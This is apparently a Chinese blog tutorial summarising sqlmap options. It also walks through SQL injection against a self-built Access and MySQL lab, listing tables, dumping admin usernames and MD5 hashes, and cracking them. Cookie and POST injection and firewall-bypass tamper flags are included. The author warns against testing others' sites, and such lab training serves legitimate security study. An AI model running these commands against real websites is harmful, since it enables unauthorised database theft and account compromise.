Sqlmap常用命令总结及注入实战(Access、mysql)
sqlmap常用命令总结:
注意:命令为kali linux中运行的 (windows中用python sqlmap.py执行)
1#、注入六连:
1. sqlmap -u "http://www.xx.com?id=x" 【查询是否存在注入点
2. --dbs 【检测站点包含哪些数据库
3. --current-db 【获取当前的数据库名
4. --tables -D "db_name" 【获取指定数据库中的表名 -D后接指定的数据库名称
5. --columns -T "table_name" -D "db_name" 【获取数据库表中的字段
6. --dump -C "columns_name" -T "table_name" -D "db_name" 【获取字段的数据内容
2#、COOKIE注入:
sqlmap -u "http://www.xx.com?id=x" --cookie "cookie" --level 2 【cookie注入 后接cookie值
3#、POST注入:
- (1)目标地址http:// www.xxx.com /login.asp
- (2)打开brup代理。
- (3)点击表单提交
- (4)burp获取拦截信息(post)
- (5)右键保存文件(.txt)到指定目录下
- (6)运行sqlmap并执行如下命令:
用例:sqlmap -r okay.txt -p username
// -r表示加载文件(及步骤(5)保存的路径),-p指定参数(即拦截的post请求中表单提交的用户名或密码等name参数)
(7)自动获取表单:--forms自动获取表单
例如:sqlmap -u www.xx.com/login.asp --forms
(8)指定参数搜索:--data
例如:sqlmap -u www.xx.com/login.asp --data "username=1"
4#、常用指令:
1. --purge 【重新扫描(--purge 删除原先对该目标扫描的记录)
2. --tables 【获取表名
3. --dbs 【检测站点包含哪些数据库
4. --current-db 【获取当前的数据库名
5. --current-user 【检测当前用户
6. --is-dba 【判断站点的当前用户是否为数据库管理员
7. --batch 【默认确认,不询问你是否输入
8. --search 【后面跟参数 -D -T -C 搜索列(C),表(T)和或数据库名称(D)
9. --threads 10 【线程,sqlmap线程最高设置为10
10. --level 3 【sqlmap默认测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头
的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高为5
11. --risk 3 【执行测试的风险(0-3,默认为1)risk越高,越慢但是越安全
12. -v 【详细的等级(0-6)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容
13. --privileges 【查看权限
14. --tamper xx.py,cc.py 【防火墙绕过,后接tamper库中的py文件
15. --method "POST" --data "page=1&id=2" 【POST方式提交数据
16. --threads number 【采用多线程 后接线程数
17. --referer "" 【使用referer欺骗
18. --user-agent "" 【自定义user-agent
19. --proxy “目标地址″ 【使用代理注入
sqlmap常用路径:
1. 添加表字段的目录在/usr/share/sqlmap/txt/common-tables.txt
2. 存放扫描记录的目录在/root/.sqlmap/output
环境准备:
1. Vmware虚拟机
2. 渗透环境:Kali linux (本地版本2018.4)(windows下安装python2和sqlmap也可进行实验)
3. web环境:windos2003 server
(建议学习搭建自己的web环境进行实验攻击,切勿拿别人网站做实验)
注入实战之Access:
温馨提醒:注重自己搭环境进行实战测试,勿对其他网站进行破坏测试。
1. 寻找注入点
2. 可先进行手工测试是否存在漏洞
3. 发现可以注入漏洞,便可手工注入,本文展示sqlmap工具的注入使用
使用命令:sqlmap -u "http://192.168.96.16/shownews.asp?id=23"
得到扫描结果:扫描类型盲注,id存在注入点,服务器使用的数据库为Access
4.列出所有的表(获取表)
使用指令:sqlmap -u "http://192.168.96.16/shownews.asp?id=23" --tables --purge
得到爆破出的表名:
注意在此manage_user为管理员的表,对我们有用的表。但是这个manage_user字符串在sqlmap的爆破表中是不存在的,
是我后面手工添加的字段,
sqlmap中添加表名字段的目录在/usr/share/sqlmap/txt/common-tables.txt中
5. 获取表中的字段(获取列):
sqlmap -u "http://192.168.96.16/shownews.asp?id=23" --columns -T "manage_user"
(--columns为获取列字段,-T为指定的表名)
6. 获取列字段的内容
使用指令:sqlmap -u "http://192.168.96.16/shownews.asp?id=23" --dump -C "username,password" -T "manage_user"
(--dump 打印出来 -C 后接需要获取的字段名 -T为指定的表名)
得到用户名admin以及经过md5加密过后的密码3acdbb255b45d296,百度md5破解得密码0791idc
自此,sqlmap对Access数据库的使用结束。
注入实战之Mysql:
温馨提醒:注重自己搭环境进行实战测试,勿对其他网站进行破坏测试。
1.手工寻找注入点
2. sqlmap检查注入点
使用命令:sqlmap -u "192.168.96.16/info_show.php?info_id=138"
检查出是mysql数据库,询问是否跳过对其他类型数据库的检测,选择Y 跳过。
检测等级与风险等级为一,共三级,越高检测越复杂的数据库信息。
检测结果得到info_id存在注入点,注入类型为盲注,数据库为Mysql。
3. 检测使用的数据库
使用指令:sqlmap -u "192.168.96.16/info_show.php?info_id=138" --current-db
4. 检测数据库中的表名(获取表)
使用指令: sqlmap -u "192.168.96.16/info_show.php?info_id=138" --tables -D "govcn"
5. 检测表中的字段名(获取列)
使用指令: sqlmap -u "192.168.96.16/info_show.php?info_id=138" --columns -T "admin" -D "govcn"
6. 获取字段内容
使用指令:sqlmap -u "192.168.96.16/info_show.php?info_id=138" --dump -C "username,password" -T "admin" -D "govcn"
得到用户名admin,以及md5加密后的密码,百度md5破解得到密码为admin。
至此,sqlmap实战对于mysql的应用到此结束。
OK~大功告成
若有错误或不妥之处劳烦大伙们指出,虚心求教,收到后及时改正!!!
Sqlmap常用命令总结及注入实战(Access、mysql)相关推荐
- Web安全工具—Sqlmap常用命令和参数(持续更新)
Web安全工具-SQLMAP常用命令和参数 简介:此篇文章主要记录学习注入神器sqlmap的过程,文章会对常见参数进行详解(附图),适合入门学习. 一:SQLMAP介绍: 简介:sqlmap是一个由p ...
- sqlmap 常用命令
常用命令 -u 指定目标URL (可以是http协议也可以是https协议) -d 连接数据库 –dbs 列出所有的数据库 –current-db 列出当前数据库 –tables 列出当前的表 –co ...
- SQLmap常用命令/使用教程
SQLmap是一款自动化SQL注入神器,用于SQL注入漏洞的检测和利用,支持多种数据库 检测位置 -u -- 指定url(GET请求) -p -- 指定参数(url包含多个参数时,指定参数) --da ...
- SQLMap使用|命令大全(干货)
SQLMap简介 SQLMap是一款开源的渗透测试工具,它可以自动检测和利用SQL注入漏洞,并对数据库执行相应的攻击. SQLMap的强大的功能包括:数据库指纹识别.数据库枚举.数据提取.密码hash ...
- Mysql常用命令行大全
Mysql常用命令行大全 第一招.mysql服务的启动和停止 net stop mysql net start mysql 第二招.登陆mysql 语法如下: mysql -u用户名 -p用户密码 键 ...
- mysql数据库管理-常用命令总结
mysql常用命令行大全 1.连接Mysql 格式: mysql -h主机地址 -u用户名 -p用户密码 1.连接到本机上的MYSQL. 首先打开DOS窗口,然后进入目录mysql\bin,再键入命令 ...
- Mysql运维常用命令回顾整理
一.前景 Mysql作为开源数据库的中坚力量之一,虽然目前已被甲骨文收购,面临闭源风险,但是mysql扔是我们运维工作中最常面对的工作,那如何做好mysql运维工作,甚至做好mysql的基础运维,都是 ...
- mysql常用命令行操作-linux
mysql常用命令行操作-linux 1. mysql -h 192.168.1.1 -u root -p 123456 -h意思是数据库所在服务器ip地址 -u是数据库用户名 -p是数据库密码 2. ...
- MySQL创建数据库及常用命令
一 配置MySQL Server 配置MySQL Server之后可以在cmd窗口中直接使用MySQL的命令.配置方式如下: 在系统环境变量中添加一条path路径:C:\Program Files\M ...
- Sysbench常用命令
1 Sysbench 安装 requirements yum -y install make automake libtool pkgconfig libaio-devel# For MySQL su ...
最新文章
- python简单装饰器_简单介绍Python装饰器(一)
- 分析mysql日志文件_MySQL日志文件与分析
- js获取网页当前页面及路径
- Study 1 —— HTML5概述
- C++11并发实战(专栏)
- 据说,很多搞科研的硕博生,都容易产生以下20个错觉,看看你中了几枪?
- 5.4 self-attention以及mask操作的实现
- LINQ分组查询统计
- #《机器学习》_周志华(西瓜书)南瓜书_第4章 决策树
- H3C交换机SSH配置完全攻略
- Android Animation之TranslateAnimation(平移动画)
- 20多个好用的 Vue 组件库
- Open-DrainPush-Pull
- python的pth打开方式_python .pth 文件 和 site 模块
- vue项目部署新浪云
- ABAP如何把任意数值类型转化为CHAR类型
- python函数**什么意思_python中函数的参数是什么意思
- C# dotnet 一个看上去还能用的二进制序列化帮助类
- Django自研告警平台-让告警排好队
- 近五年中文电子病历命名实体识别研究进展
热门文章
- 在RStudio中调用python包
- 移动端车牌识别sdk-手机拍照识别车牌技术
- 全国车辆限行查询api 全国限行限号数据服务
- 今日制造怎么安装solidworks插件_PS插件安装后出现了登陆界面,无法使用怎么解决?保证一招搞定...
- python pdb模块_Biopython PDB模块
- 十大排序算法(Top 10 Sorting Algorithms)
- 快速解决Ubuntu无法访问Windows分区的问题
- turtle库 科赫雪花(bug)的绘制
- 基于FPGA的VGA显示,简单的历程和注释(DE2-115)
- 欢迎使用云-“您的Apple ID已被禁用。”